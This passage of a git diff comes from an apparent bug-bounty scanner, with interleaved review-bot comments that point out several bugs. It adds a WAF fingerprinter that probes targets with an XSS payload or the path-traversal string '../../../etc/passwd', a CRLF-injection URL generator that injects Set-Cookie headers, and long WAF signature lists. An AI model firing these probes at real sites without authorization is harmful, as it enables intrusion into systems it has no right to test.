+ file=sys.stderr, + ) else: - cprint(f"No URLs found for {category} dorks...", 'red', file=sys.stderr) + cprint(f"No URLs found for {category} dorks...", "red", file=sys.stderr) 
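Review bot: The unpack `category, urls, dork = result` now requires a three-item tuple, so any producer that still returns `(category, urls)` would raise `ValueError` in `safe_add_result`. The producers are outside this hunk, so that cannot be confirmed from here. The comment above the function could name the expected shape, for example `# result is (category, urls, dork)`, and the `TODO category not working` remark is left unresolved by this change.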
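Review bot: The dork file name is derived with `.replace(".txt", "_dork.txt")`, which is a no-op when the configured path has no `.txt`, so the dork text would then be appended to the URL list itself. It also rewrites every `.txt` occurrence in the path, including one in a directory name. Computing it once before the loop with `root, ext = os.path.splitext(path)` and `dork_path = f"{root}_dork{ext}"` avoids both, provided `os` is imported in this module. The dork line is also written once per URL, so the file fills with duplicates, and `dork + "\n"` raises `TypeError` if a producer passes `None`.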
diff --git a/bounty_drive/utils/waf_mitigation.py b/bounty_drive/utils/waf_mitigation.py index 8bba42b..4aea1aa 100644 --- a/bounty_drive/utils/waf_mitigation.py +++ b/bounty_drive/utils/waf_mitigation.py @@ -3,20 +3,23 @@ ######################################################################################### # from https://github.com/s0md3v/XSStrike/blob/master/core/wafDetector.py +import glob import json import re -import sys - +import eventlet, requests from termcolor import cprint from utils.request_manager import start_request +# from bounty_drive.attacks.xss.xss_config import XSS_TEST_PAYLOAD + -def waf_detector(proxies, url, params, headers, GET, delay, timeout): - with open(sys.path[0] + "waf_signatures.json", "r") as file: - wafSignatures = json.load(file) +def waf_detector(proxies, url, params, headers, GET, mode="xss"): # a payload which is noisy enough to provoke the WAF - noise = '<script>alert("XSS")</script>' + if mode == "xss": + noise = XSS_TEST_PAYLOAD + else: + noise = "../../../etc/passwd" params["xss"] = noise # Opens the noise injected payload response = start_request( 
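Review bot: `noise = XSS_TEST_PAYLOAD` is reached with the default `mode="xss"`, but the only import of that name in this hunk is commented out (`# from bounty_drive.attacks.xss.xss_config import XSS_TEST_PAYLOAD`), so unless it is defined elsewhere in the module the default call raises `NameError`. Restoring the import or defining a module-level constant fixes that. The new signature drops `delay` and `timeout`, so callers still passing them would raise `TypeError`. The probe is stored under `params["xss"]` in both modes, which mutates the caller's dict and no longer describes the non-XSS branch. The function body continues outside the hunk.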
@@ -28,29 +31,133 @@ def waf_detector(proxies, url, params, headers, GET, delay, timeout): cprint("Waf Detector code: {}".format(code)) cprint("Waf Detector headers:", response.headers) + waf_signatures_files = glob.glob("waf_signature/*.json", recursive=True) + bestMatch = [0, None] + for waf_signatures_file in waf_signatures_files: + with open(waf_signatures_file, "r") as file: + wafSignatures = json.load(file) + if int(code) >= 400: + for wafName, wafSignature in wafSignatures.items(): + score = 0 + pageSign = wafSignature["page"] + codeSign = wafSignature["code"] + headersSign = wafSignature["headers"] + if pageSign: + if re.search(pageSign, page, re.I): + score += 1 + if codeSign: + if re.search(codeSign, code, re.I): + score += 0.5 # increase the overall score by a smaller amount because http codes aren't strong indicators + if headersSign: + if re.search(headersSign, headers, re.I): + score += 1 + # if the overall score of the waf is higher than the previous one + if score > bestMatch[0]: + del bestMatch[:] # delete the previous one + bestMatch.extend([score, wafName]) # and add this one + else: + return None if int(code) >= 400: - bestMatch = [0, None] - for wafName, wafSignature in wafSignatures.items(): - score = 0 - pageSign = wafSignature["page"] - codeSign = wafSignature["code"] - headersSign = wafSignature["headers"] - if pageSign: - if re.search(pageSign, page, re.I): - score += 1 - if codeSign: - if re.search(codeSign, code, re.I): - score += 0.5 # increase the overall score by a smaller amount because http codes aren't strong indicators - if headersSign: - if re.search(headersSign, headers, re.I): - score += 1 - # if the overall score of the waf is higher than the previous one - if score > bestMatch[0]: - del bestMatch[:] # delete the previous one - bestMatch.extend([score, wafName]) # and add this one if bestMatch[0] != 0: return bestMatch[1] else: return None - else: - return None + + +def heuristic_scanner( + url, + payload, + method, + cookie, 
+ headers, + timeout, + ssl, + data, + verbose, + silent, + stable, + delay, +): + """ + A basic scan to check if the URL is vulnerable or not + """ + url = url.strip() + scheme, host = urlparse(url).scheme, urlparse(url).netloc + url = scheme + "://" + host + if not url.endswith("/"): + url = url + "/" + final_url = url + payload + response = requester.do( + final_url, + method, + cookie, + headers, + timeout, + ssl, + data, + verbose, + silent, + stable, + delay, + ) + try: + code, rheaders = response[1], str(response[2]) + if not int(code) >= 400: + if "nefcore" and "crlfsuite" in rheaders: + heuristic_result.add(final_url) + except TypeError: + pass + + +# https://github.com/MichaelStott/CRLF-Injection-Scanner/blob/master/scanner.py#L28 +class CrlfScanner: + """Scans URLs for CRLF injection.""" + + # List of web protocols. + PROTOCOL_LIST = ["http", "https"] + + # Append this to beginning of escape sequence. + APPEND_LIST = ["", "crlf", "?crlf=", "#"] + + # List of escape sequences that possibly result in crlf. + ESCAPE_LIST = ["%0d", "%0a", "%0d%0a", "%23%0d", "%23%0a", "%23%0d%0a"] + + # By default, the scanner will try to inject a Set-Cookie statment. + DEFAULT_INJ = "Set-Cookie:param=crlf;" + + # If we don't get a response within the TIMEOUT, terminate the current scan. 
+ TIMEOUT = 5 + + def __init__(self): + self.inj_str = self.DEFAULT_INJ + + def generate_vuln_urls(self, url): + """Generate URLS that may be vulnerable to CRLF injection.""" + vuln_urls = [] + if not url.endswith("/"): + url += "/" + for protocol in self.PROTOCOL_LIST: + for append in self.APPEND_LIST: + for escape in self.ESCAPE_LIST: + vuln_urls.append( + protocol + "://" + url + append + escape + self.inj_str + ) + return vuln_urls + + def scan(self, url): + """Scan target URL for CRLF injection""" + result = False + session = requests.Session() + with eventlet.Timeout(self.TIMEOUT): + try: + session.get(url) + except KeyboardInterrupt: + raise + except: + pass + if ( + "param" in session.cookies.get_dict() + and "crlf" in session.cookies.get_dict().values() + ): + result = True + return result diff --git a/bounty_drive/utils/web_scraper.py b/bounty_drive/utils/web_scraper.py new file mode 100644 index 0000000..70a9532 --- /dev/null +++ b/bounty_drive/utils/web_scraper.py @@ -0,0 +1,3 @@ +def crawl(url, urls): + raise NotImplementedError("Crawling not implemented for now") + return urls diff --git a/bounty_drive/waf_signature/waf_signatures.json b/bounty_drive/waf_signature/waf_signatures.json new file mode 100644 index 0000000..ca8e604 --- /dev/null +++ b/bounty_drive/waf_signature/waf_signatures.json 
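Review bot: `heuristic_scanner` calls `urlparse`, `requester.do` and `heuristic_result.add`, none of which is imported or defined in the lines this commit shows for the module, so it would fail with `NameError` on first use unless they come from code outside the hunks. Its check `if "nefcore" and "crlfsuite" in rheaders:` only tests the second string, because the first operand is a non-empty literal. The line appears to mean `if "nefcore" in rheaders and "crlfsuite" in rheaders:`. In `CrlfScanner.scan` the bare `except: pass` hides every failure, and `eventlet.Timeout` may never fire around a blocking `requests` call unless the process is monkey-patched. `session.get(url, timeout=self.TIMEOUT)` with `except requests.exceptions.RequestException:` is a simpler bound. In `waf_detector`, `glob.glob("waf_signature/*.json")` is resolved against the current working directory, so no signatures load when the tool is started from another directory.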
@@ -0,0 +1,332 @@ +{ + "360 Web Application Firewall (360)": { + "code": "493", + "page": "/wzws-waf-cgi/", + "headers": "X-Powered-By-360wzb" + }, + "aeSecure": { + "code": "", + "page": "aesecure_denied.png", + "headers": "aeSecure-code" + }, + "Airlock (Phion/Ergon)": { + "code": "", + "page": "", + "headers": "AL[_-]?(SESS|LB)" + }, + "Anquanbao Web Application Firewall (Anquanbao)": { + "code": "405", + "page": "/aqb_cc/error/|hidden_intercept_time", + "headers": "X-Powered-By-Anquanbao" + }, + "Armor Protection (Armor Defense)": { + "code": "", + "page": "This request has been blocked by website protection from Armor", + "headers": "" + }, + "Application Security Manager (F5 Networks)": { + "code": "", + "page": "The requested URL was rejected\\. Please consult with your administrator\\.", + "headers": "" + }, + "Amazon Web Services Web Application Firewall (Amazon)": { + "code": "403", + "page": "", + "headers": "\\bAWS" + }, + "Yunjiasu Web Application Firewall (Baidu)": { + "code": "", + "page": "", + "headers": "yunjiasu-nginx" + }, + "Barracuda Web Application Firewall (Barracuda Networks)": { + "code": "", + "page": "", + "headers": "barra_counter_session=|(|\\b)barracuda_" + }, + "BIG-IP Application Security Manager (F5 Networks)": { + "code": "", + "page": "", + "headers": "BigIP|F5\\Z|\\bTS[0-9a-f]+=|X-WA-Info:|X-Cnection:" + }, + "BinarySEC Web Application Firewall (BinarySEC)": { + "code": "", + "page": "", + "headers": "binarysec" + }, + "BlockDoS": { + "code": "", + "page": "", + "headers": "BlockDos\\.net" + }, + "ChinaCache (ChinaCache Networks)": { + "code": "400", + "page": "", + "headers": "Powered-By-ChinaCache" + }, + "Cisco ACE XML Gateway (Cisco Systems)": { + "code": "", + "page": "", + "headers": "ACE XML Gateway" + }, + "Cloudbric Web Application Firewall (Cloudbric)": { + "code": "", + "page": "Cloudbric|Malicious Code Detected", + "headers": "" + }, + "CloudFlare Web Application Firewall (CloudFlare)": { + "code": "", + "page": 
"Attention Required! \\| Cloudflare|CloudFlare Ray ID:|var CloudFlare=|CLOUDFLARE_ERROR_500S_BOX", + "headers": "cloudflare|__cfduid=|cf-ray" + }, + "CloudFront (Amazon)": { + "code": "", + "page": "", + "headers": "Error from cloudfront" + }, + "Comodo Web Application Firewall (Comodo)": { + "code": "", + "page": "", + "headers": "Protected by COMODO WAF" + }, + "CrawlProtect (Jean-Denis Brun)": { + "code": "", + "page": "This site is protected by CrawlProtect", + "headers": "" + }, + "IBM WebSphere DataPower (IBM)": { + "code": "", + "page": "", + "headers": "X-Backside-Transport.*?(OK|FAIL)" + }, + "Deny All Web Application Firewall (DenyAll)": { + "code": "", + "page": "Condition Intercepted", + "headers": "sessioncookie" + }, + "Distil Web Application Firewall Security (Distil Networks)": { + "code": "", + "page": "", + "headers": "x-distil-cs" + }, + "DOSarrest (DOSarrest Internet Security)": { + "code": "", + "page": "", + "headers": "DOSarrest|X-DIS-Request-ID" + }, + "dotDefender (Applicure Technologies)": { + "code": "", + "page": "dotDefender Blocked Your Request|<meta name=\\.description\\. 
content=\\.Applicure is the leading provider of web application security|Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon)", + "headers": "X-dotDefender-denied" + }, + "EdgeCast Web Application Firewall (Verizon)": { + "code": "400", + "page": "", + "headers": "SERVER.*?ECDF" + }, + "ExpressionEngine (EllisLab)": { + "code": "", + "page": "Invalid (GET|POST) Data", + "headers": "" + }, + "FortiWeb Web Application Firewall (Fortinet)": { + "code": "", + "page": "\\.fgd_icon|\\.blocked|\\.authenticate", + "headers": "FORTIWAFSID=|cookiesession1=" + }, + "Hyperguard Web Application Firewall (art of defence)": { + "code": "", + "page": "", + "headers": "ODSESSION=" + }, + "Incapsula Web Application Firewall (Incapsula/Imperva)": { + "code": "", + "page": "Incapsula incident ID|_Incapsula_Resource|subject=WAF Block Page|If you feel you have been blocked in error, please contact Customer Support", + "headers": "X-Iinfo|incap_ses|visid_incap" + }, + "ISA Server (Microsoft)": { + "code": "", + "page": "The server denied the specified Uniform Resource Locator (URL)\\. 
Contact the server administrator\\.", + "headers": "" + }, + "Jiasule Web Application Firewall (Jiasule)": { + "code": "403", + "page": "static\\.jiasule\\.com/static/js/http_error\\.js|notice-jiasule", + "headers": "jiasule-WAF|__jsluid=|jsl_tracking" + }, + "KS-WAF (Knownsec)": { + "code": "", + "page": "ks-waf-error\\.png'", + "headers": "" + }, + "KONA Security Solutions (Akamai Technologies)": { + "code": "400|403|501", + "page": "", + "headers": "AkamaiGHost" + }, + "ModSecurity: Open Source Web Application Firewall (Trustwave)": { + "code": "", + "page": "This error was generated by Mod_Security|One or more things in your request were suspicious|rules of the mod_security module", + "headers": "Mod_Security|NOYB" + }, + "NAXSI (NBS System)": { + "code": "", + "page": "", + "headers": "naxsi/waf" + }, + "NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)": { + "code": "", + "page": "", + "headers": "NCI__SessionId=" + }, + "NetScaler (Citrix Systems)": { + "code": "", + "page": "", + "headers": "ns_af=|citrix_ns_id|NSC_|NS-CACHE" + }, + "Newdefend Web Application Firewall (Newdefend)": { + "code": "", + "page": "", + "headers": "newdefend" + }, + "NSFOCUS Web Application Firewall (NSFOCUS)": { + "code": "", + "page": "", + "headers": "NSFocus" + }, + "Palo Alto Firewall (Palo Alto Networks)": { + "code": "", + "page": "has been blocked in accordance with company policy", + "headers": "" + }, + "Profense Web Application Firewall (Armorlogic)": { + "code": "", + "page": "", + "headers": "PLBSID=|Profense" + }, + "AppWall (Radware)": { + "code": "", + "page": "Unauthorized Activity Has Been Detected.*?Case Number:", + "headers": "X-SL-CompState" + }, + "Reblaze Web Application Firewall (Reblaze)": { + "code": "", + "page": "", + "headers": "rbzid=|Reblaze Secure Web Gateway" + }, + "ASP.NET RequestValidationMode (Microsoft)": { + "code": "500", + "page": "ASP\\.NET has detected data in the request that is potentially dangerous|Request 
Validation has detected a potentially dangerous client input value|HttpRequestValidationException", + "headers": "" + }, + "Safe3 Web Application Firewall": { + "code": "", + "page": "", + "headers": "Safe3" + }, + "Safedog Web Application Firewall (Safedog)": { + "code": "", + "page": "", + "headers": "WAF/2\\.0|safedog" + }, + "SecureIIS Web Server Security (BeyondTrust)": { + "code": "", + "page": "SecureIIS.*?Web Server Protection|http://www\\.eeye\\.com/SecureIIS/|\\?subject=[^>]*SecureIIS Error", + "headers": "" + }, + "SEnginx (Neusoft Corporation)": { + "code": "", + "page": "SENGINX-ROBOT-MITIGATION", + "headers": "" + }, + "TrueShield Web Application Firewall (SiteLock)": { + "code": "", + "page": "SiteLock Incident ID|sitelock-site-verification|sitelock_shield_logo", + "headers": "" + }, + "SonicWALL (Dell)": { + "code": "", + "page": "This request is blocked by the SonicWALL|#shd|#nsa_banner|Web Site Blocked.*?\\bnsa_banner", + "headers": "SonicWALL" + }, + "UTM Web Protection (Sophos)": { + "code": "", + "page": "Powered by UTM Web Protection", + "headers": "" + }, + "Stingray Application Firewall (Riverbed / Brocade)": { + "code": "403|500", + "page": "", + "headers": "X-Mapping-" + }, + "CloudProxy WebSite Firewall (Sucuri)": { + "code": "403", + "page": "Access Denied.*?Sucuri Website Firewall|Sucuri WebSite Firewall.*?Access Denied|Questions\\?.*?cloudproxy@sucuri\\.net", + "headers": "Sucuri/Cloudproxy|X-Sucuri" + }, + "Tencent Cloud Web Application Firewall (Tencent Cloud Computing)": { + "code": "405", + "page": "waf\\.tencent-cloud\\.com", + "headers": "" + }, + "Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)": { + "code": "", + "page": "", + "headers": "st8(id|_wat|_wlf)" + }, + "TrafficShield (F5 Networks)": { + "code": "", + "page": "", + "headers": "F5-TrafficShield|ASINFO=" + }, + "UrlScan (Microsoft)": { + "code": "", + "page": "Rejected-By-UrlScan", + "headers": "Rejected-By-UrlScan" + }, + "USP Secure Entry Server 
(United Security Providers)": { + "code": "", + "page": "", + "headers": "Secure Entry Server" + }, + "Varnish FireWall (OWASP)": { + "code": "", + "page": "Request rejected by xVarnish-WAF|\\bXID: \\d+", + "headers": "" + }, + "Wallarm Web Application Firewall (Wallarm)": { + "code": "", + "page": "", + "headers": "nginx-wallarm" + }, + "WatchGuard (WatchGuard Technologies)": { + "code": "", + "page": "", + "headers": "WatchGuard" + }, + "WebKnight Application Firewall (AQTRONIX)": { + "code": "999", + "page": "WebKnight Application Firewall Alert|AQTRONIX WebKnight", + "headers": "WebKnight" + }, + "Wordfence (Feedjit)": { + "code": "", + "page": "This response was generated by Wordfence|Your access to this site has been limited", + "headers": "" + }, + "Zenedge Web Application Firewall (Zenedge)": { + "code": "", + "page": "zenedge/assets/", + "headers": "ZENEDGE" + }, + "Yundun Web Application Firewall (Yundun)": { + "code": "", + "page": "", + "headers": "YUNDUN" + }, + "Yunsuo Web Application Firewall (Yunsuo)": { + "code": "", + "page": "<img class=.yunsuologo.", + "headers": "yunsuo_session" + } +} diff --git a/bounty_drive/waf_signature/waf_signatures_2.json b/bounty_drive/waf_signature/waf_signatures_2.json new file mode 100644 index 0000000..997dc24 --- /dev/null +++ b/bounty_drive/waf_signature/waf_signatures_2.json 
@@ -0,0 +1,956 @@ +{ + "360 Web Application Firewall (360)": { + "code": "493", + "page": "/wzws-waf-cgi/", + "headers": "X-Powered-By-360wzb", + "cookie": "" + }, + "aeSecure": { + "code": "", + "page": "aesecure_denied.png", + "headers": "aeSecure-code", + "cookie": "" + }, + "Airlock (Phion/Ergon)": { + "code": "", + "page": "", + "headers": "AL[_-]?(SESS|LB)", + "cookie": "" + }, + "Anquanbao Web Application Firewall (Anquanbao)": { + "code": "405", + "page": "/aqb_cc/error/|hidden_intercept_time", + "headers": "X-Powered-By-Anquanbao", + "cookie": "" + }, + "Armor Protection (Armor Defense)": { + "code": "", + "page": "This request has been blocked by website protection from Armor", + "headers": "", + "cookie": "" + }, + "Application Security Manager (F5 Networks)": { + "code": "", + "page": "The requested URL was rejected\\. Please consult with your administrator\\.", + "headers": "", + "cookie": "" + }, + "Amazon Web Services Web Application Firewall (Amazon)": { + "code": "403", + "page": "", + "headers": "\\bAWS", + "cookie": "" + }, + "Yunjiasu Web Application Firewall (Baidu)": { + "code": "", + "page": "", + "headers": "yunjiasu-nginx", + "cookie": "" + }, + "Barracuda Web Application Firewall (Barracuda Networks)": { + "code": "", + "page": "", + "headers": "barra_counter_session=|(|\\b)barracuda_", + "cookie": "" + }, + "BIG-IP Application Security Manager (F5 Networks)": { + "code": "", + "page": "", + "headers": "BigIP|F5\\Z|\\bTS[0-9a-f]+=|X-WA-Info:|X-Cnection:", + "cookie": "" + }, + "BinarySEC Web Application Firewall (BinarySEC)": { + "code": "", + "page": "", + "headers": "binarysec", + "cookie": "" + }, + "BlockDoS": { + "code": "", + "page": "", + "headers": "BlockDos\\.net", + "cookie": "" + }, + "ChinaCache (ChinaCache Networks)": { + "code": "400", + "page": "", + "headers": "Powered-By-ChinaCache", + "cookie": "" + }, + "Cisco ACE XML Gateway (Cisco Systems)": { + "code": "", + "page": "", + "headers": "ACE XML Gateway", + "cookie": "" + 
}, + "Cloudbric Web Application Firewall (Cloudbric)": { + "code": "", + "page": "Cloudbric|Malicious Code Detected", + "headers": "", + "cookie": "" + }, + "CloudFlare Web Application Firewall (CloudFlare)": { + "code": "", + "page": "Attention Required! \\| Cloudflare|CloudFlare Ray ID:|var CloudFlare=|CLOUDFLARE_ERROR_500S_BOX", + "headers": "cloudflare|__cfduid=|cf-ray", + "cookie": "" + }, + "CloudFront (Amazon)": { + "code": "", + "page": "", + "headers": "Error from cloudfront", + "cookie": "" + }, + "Comodo Web Application Firewall (Comodo)": { + "code": "", + "page": "", + "headers": "Protected by COMODO WAF", + "cookie": "" + }, + "CrawlProtect (Jean-Denis Brun)": { + "code": "", + "page": "This site is protected by CrawlProtect", + "headers": "", + "cookie": "" + }, + "IBM WebSphere DataPower (IBM)": { + "code": "", + "page": "", + "headers": "X-Backside-Transport.*?(OK|FAIL)", + "cookie": "" + }, + "Deny All Web Application Firewall (DenyAll)": { + "code": "", + "page": "Condition Intercepted", + "headers": "sessioncookie", + "cookie": "" + }, + "Distil Web Application Firewall Security (Distil Networks)": { + "code": "", + "page": "", + "headers": "x-distil-cs", + "cookie": "" + }, + "DOSarrest (DOSarrest Internet Security)": { + "code": "", + "page": "", + "headers": "DOSarrest|X-DIS-Request-ID", + "cookie": "" + }, + "dotDefender (Applicure Technologies)": { + "code": "", + "page": "dotDefender Blocked Your Request|<meta name=\\.description\\. 
content=\\.Applicure is the leading provider of web application security|Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon)", + "headers": "X-dotDefender-denied", + "cookie": "" + }, + "EdgeCast Web Application Firewall (Verizon)": { + "code": "400", + "page": "", + "headers": "SERVER.*?ECDF", + "cookie": "" + }, + "ExpressionEngine (EllisLab)": { + "code": "", + "page": "Invalid (GET|POST) Data", + "headers": "", + "cookie": "" + }, + "FortiWeb Web Application Firewall (Fortinet)": { + "code": "", + "page": "\\.fgd_icon|\\.blocked|\\.authenticate", + "headers": "FORTIWAFSID=|cookiesession1=", + "cookie": "" + }, + "Hyperguard Web Application Firewall (art of defence)": { + "code": "", + "page": "", + "headers": "ODSESSION=", + "cookie": "" + }, + "Incapsula Web Application Firewall (Incapsula/Imperva)": { + "code": "", + "page": "Incapsula incident ID|_Incapsula_Resource|subject=WAF Block Page|If you feel you have been blocked in error, please contact Customer Support", + "headers": "X-Iinfo|incap_ses|visid_incap", + "cookie": "" + }, + "ISA Server (Microsoft)": { + "code": "", + "page": "The server denied the specified Uniform Resource Locator (URL)\\. 
Contact the server administrator\\.", + "headers": "", + "cookie": "" + }, + "Jiasule Web Application Firewall (Jiasule)": { + "code": "403", + "page": "static\\.jiasule\\.com/static/js/http_error\\.js|notice-jiasule", + "headers": "jiasule-WAF|__jsluid=|jsl_tracking", + "cookie": "" + }, + "KS-WAF (Knownsec)": { + "code": "", + "page": "ks-waf-error\\.png'", + "headers": "", + "cookie": "" + }, + "KONA Security Solutions (Akamai Technologies)": { + "code": "400|403|501", + "page": "", + "headers": "AkamaiGHost", + "cookie": "" + }, + "ModSecurity: Open Source Web Application Firewall (Trustwave)": { + "code": "", + "page": "This error was generated by Mod_Security|One or more things in your request were suspicious|rules of the mod_security module", + "headers": "Mod_Security|NOYB", + "cookie": "" + }, + "NAXSI (NBS System)": { + "code": "", + "page": "", + "headers": "naxsi/waf", + "cookie": "" + }, + "NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)": { + "code": "", + "page": "", + "headers": "NCI__SessionId=", + "cookie": "" + }, + "NetScaler (Citrix Systems)": { + "code": "", + "page": "", + "headers": "ns_af=|citrix_ns_id|NSC_|NS-CACHE", + "cookie": "" + }, + "Newdefend Web Application Firewall (Newdefend)": { + "code": "", + "page": "", + "headers": "newdefend", + "cookie": "" + }, + "NSFOCUS Web Application Firewall (NSFOCUS)": { + "code": "", + "page": "", + "headers": "NSFocus", + "cookie": "" + }, + "Palo Alto Firewall (Palo Alto Networks)": { + "code": "", + "page": "has been blocked in accordance with company policy", + "headers": "", + "cookie": "" + }, + "Profense Web Application Firewall (Armorlogic)": { + "code": "", + "page": "", + "headers": "PLBSID=|Profense", + "cookie": "" + }, + "AppWall (Radware)": { + "code": "", + "page": "Unauthorized Activity Has Been Detected.*?Case Number:", + "headers": "X-SL-CompState", + "cookie": "" + }, + "Reblaze Web Application Firewall (Reblaze)": { + "code": "", + "page": "", + 
"headers": "rbzid=|Reblaze Secure Web Gateway", + "cookie": "" + }, + "ASP.NET RequestValidationMode (Microsoft)": { + "code": "500", + "page": "ASP\\.NET has detected data in the request that is potentially dangerous|Request Validation has detected a potentially dangerous client input value|HttpRequestValidationException", + "headers": "", + "cookie": "" + }, + "Safe3 Web Application Firewall": { + "code": "", + "page": "", + "headers": "Safe3", + "cookie": "" + }, + "Safedog Web Application Firewall (Safedog)": { + "code": "", + "page": "", + "headers": "WAF/2\\.0|safedog", + "cookie": "" + }, + "SecureIIS Web Server Security (BeyondTrust)": { + "code": "", + "page": "SecureIIS.*?Web Server Protection|http://www\\.eeye\\.com/SecureIIS/|\\?subject=[^>]*SecureIIS Error", + "headers": "", + "cookie": "" + }, + "SEnginx (Neusoft Corporation)": { + "code": "", + "page": "SENGINX-ROBOT-MITIGATION", + "headers": "", + "cookie": "" + }, + "TrueShield Web Application Firewall (SiteLock)": { + "code": "", + "page": "SiteLock Incident ID|sitelock-site-verification|sitelock_shield_logo", + "headers": "", + "cookie": "" + }, + "SonicWALL (Dell)": { + "code": "", + "page": "This request is blocked by the SonicWALL|#shd|#nsa_banner|Web Site Blocked.*?\\bnsa_banner", + "headers": "SonicWALL", + "cookie": "" + }, + "UTM Web Protection (Sophos)": { + "code": "", + "page": "Powered by UTM Web Protection", + "headers": "", + "cookie": "" + }, + "Stingray Application Firewall (Riverbed / Brocade)": { + "code": "403|500", + "page": "", + "headers": "X-Mapping-", + "cookie": "" + }, + "CloudProxy WebSite Firewall (Sucuri)": { + "code": "403", + "page": "Access Denied.*?Sucuri Website Firewall|Sucuri WebSite Firewall.*?Access Denied|Questions\\?.*?cloudproxy@sucuri\\.net", + "headers": "Sucuri/Cloudproxy|X-Sucuri", + "cookie": "" + }, + "Tencent Cloud Web Application Firewall (Tencent Cloud Computing)": { + "code": "405", + "page": "waf\\.tencent-cloud\\.com", + "headers": "", + 
"cookie": "" + }, + "Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)": { + "code": "", + "page": "", + "headers": "st8(id|_wat|_wlf)", + "cookie": "" + }, + "TrafficShield (F5 Networks)": { + "code": "", + "page": "", + "headers": "F5-TrafficShield|ASINFO=", + "cookie": "" + }, + "UrlScan (Microsoft)": { + "code": "", + "page": "Rejected-By-UrlScan", + "headers": "Rejected-By-UrlScan", + "cookie": "" + }, + "USP Secure Entry Server (United Security Providers)": { + "code": "", + "page": "", + "headers": "Secure Entry Server", + "cookie": "" + }, + "Varnish FireWall (OWASP)": { + "code": "", + "page": "Request rejected by xVarnish-WAF|\\bXID: \\d+", + "headers": "", + "cookie": "" + }, + "Wallarm Web Application Firewall (Wallarm)": { + "code": "", + "page": "", + "headers": "nginx-wallarm", + "cookie": "" + }, + "WatchGuard (WatchGuard Technologies)": { + "code": "", + "page": "", + "headers": "WatchGuard", + "cookie": "" + }, + "WebKnight Application Firewall (AQTRONIX)": { + "code": "999", + "page": "WebKnight Application Firewall Alert|AQTRONIX WebKnight", + "headers": "WebKnight", + "cookie": "" + }, + "Wordfence (Feedjit)": { + "code": "", + "page": "This response was generated by Wordfence|Your access to this site has been limited", + "headers": "", + "cookie": "" + }, + "Zenedge Web Application Firewall (Zenedge)": { + "code": "", + "page": "zenedge/assets/", + "headers": "ZENEDGE", + "cookie": "" + }, + "Yundun Web Application Firewall (Yundun)": { + "code": "", + "page": "", + "headers": "YUNDUN", + "cookie": "" + }, + "Yunsuo Web Application Firewall (Yunsuo)": { + "code": "", + "page": "<img class=.yunsuologo.", + "headers": "yunsuo_session", + "cookie": "" + }, + "AireeCDN (Airee)": { + "code": "", + "page": "airee\\.cloud", + "headers": "Airee", + "cookie": "" + }, + "Alert Logic": { + "code": "", + "page": "<(title|h\\d{1})>requested url cannot be found|we are sorry.{0,10}?but the page you are looking for cannot be found|back to 
previous page|proceed to homepage|reference id", + "headers": "", + "cookie": "" + }, + "AliYunDun (Alibaba Cloud Computing)": { + "code": "405", + "page": "error(s)?\\.aliyun(dun)?\\.(com|net)?|cdn\\.aliyun(cs)?\\.com", + "headers": "", + "cookie": "aliyungf_tc=" + }, + "AnYu (AnYu Technologies)": { + "code": "", + "page": "anyu.{0,10}?the green channel|your access has been intercepted by anyu", + "headers": "", + "cookie": "" + }, + "Approach": { + "code": "", + "page": "approach.{0,10}?web application (firewall|filtering)|approach.{0,10}?infrastructure team", + "headers": "", + "cookie": "" + }, + "ArvanCloud": { + "code": "", + "page": "", + "headers": "ArvanCloud", + "cookie": "" + }, + "ASPA Firewall (ASPA Engineering Co.)": { + "code": "", + "page": "", + "headers": "ASPA[\\-_]?WAF|ASPA-Cache-Status", + "cookie": "" + }, + "ASP.NET Generic (Microsoft)": { + "code": "", + "page": "iis (\\d+.)+?detailed error|potentially dangerous request querystring|application error from being viewed remotely (for security reasons)?|An application error occurred on the server", + "headers": "", + "cookie": "" + }, + "Astra (Czar Securities)": { + "code": "", + "page": "astrawebsecurity\\.freshdesk\\.com|www\\.getastra\\.com/assets/images", + "headers": "", + "cookie": "cz_astra_csrf_cookie" + }, + "AWS Elastic Load Balancer (Amazon)": { + "code": "", + "page": "", + "headers": "X-AMZ-ID|X-AMZ-Request-ID", + "cookie": "aws.?alb=" + }, + "AzionCDN (AzionCDN)": { + "code": "", + "page": "", + "headers": "Azion([-_]CDN)?", + "cookie": "" + }, + "Barikode (Ethic Ninja)": { + "code": "", + "page": "<strong>barikode<.strong>", + "headers": "", + "cookie": "" + }, + "Bekchy (Faydata Technologies Inc.)": { + "code": "", + "page": "Bekchy.{0,10}?Access Denied|bekchy\\.com/report", + "headers": "", + "cookie": "" + }, + "Beluga CDN (Beluga)": { + "code": "", + "page": "", + "headers": "Beluga", + "cookie": "beluga_request_trail=" + }, + "BitNinja": { + "code": "", + "page": "Security 
check by BitNinja|Visitor anti-robot validation", + "headers": "", + "cookie": "" + }, + "Bluedon (Bluedon IST)": { + "code": "", + "page": "bluedon web application firewall", + "headers": "BDWAF", + "cookie": "" + }, + "BulletProof Security Pro (AITpro Security)": { + "code": "", + "page": "\\+?bpsMessage|403 Forbidden Error Page|If you arrived here due to a search", + "headers": "", + "cookie": "" + }, + "CacheFly CDN (CacheFly)": { + "code": "", + "page": "", + "headers": "Cachefly", + "cookie": "cfly_req.*=" + }, + "CacheWall (Varnish)": { + "code": "", + "page": "security by cachewall|403 naughty.{0,10}?not nice!|varnish cache server", + "headers": "Varnish|X-Varnish|X-Cachewall-Action|X-Cachewall-Reason", + "cookie": "" + }, + "CdnNS Application Gateway (CdnNs/WdidcNet)": { + "code": "", + "page": "cdnnswaf application gateway", + "headers": "", + "cookie": "" + }, + "WP Cerber Security (Cerber Tech": { + "code": "", + "page": "your request looks suspicious or similar to automated|our server stopped processing your request|We.re sorry.{0,10}?you are not allowed to proceed|requests from spam posting software|<title>403 Access Forbidden", + "headers": "", + "cookie": "" + }, + "Chuang Yu Shield (Yunaq)": { + "code": "", + "page": "www\\.365cyd\\.com|help\\.365cyd\\.com/cyd\\-error\\-help.html\\?code=403", + "headers": "", + "cookie": "" + }, + "ACE XML Gateway (Cisco)": { + "code": "", + "page": "", + "headers": "ACE XML Gateway", + "cookie": "" + }, + "Cloudfloor (Cloudfloor DNS)": { + "code": "", + "page": "<(title|h\\d{1})>CloudfloorDNS.{0,6}?Web Application Firewall Error|www\\.cloudfloordns\\.com/contact", + "headers": "CloudfloorDNS(.WAF)?", + 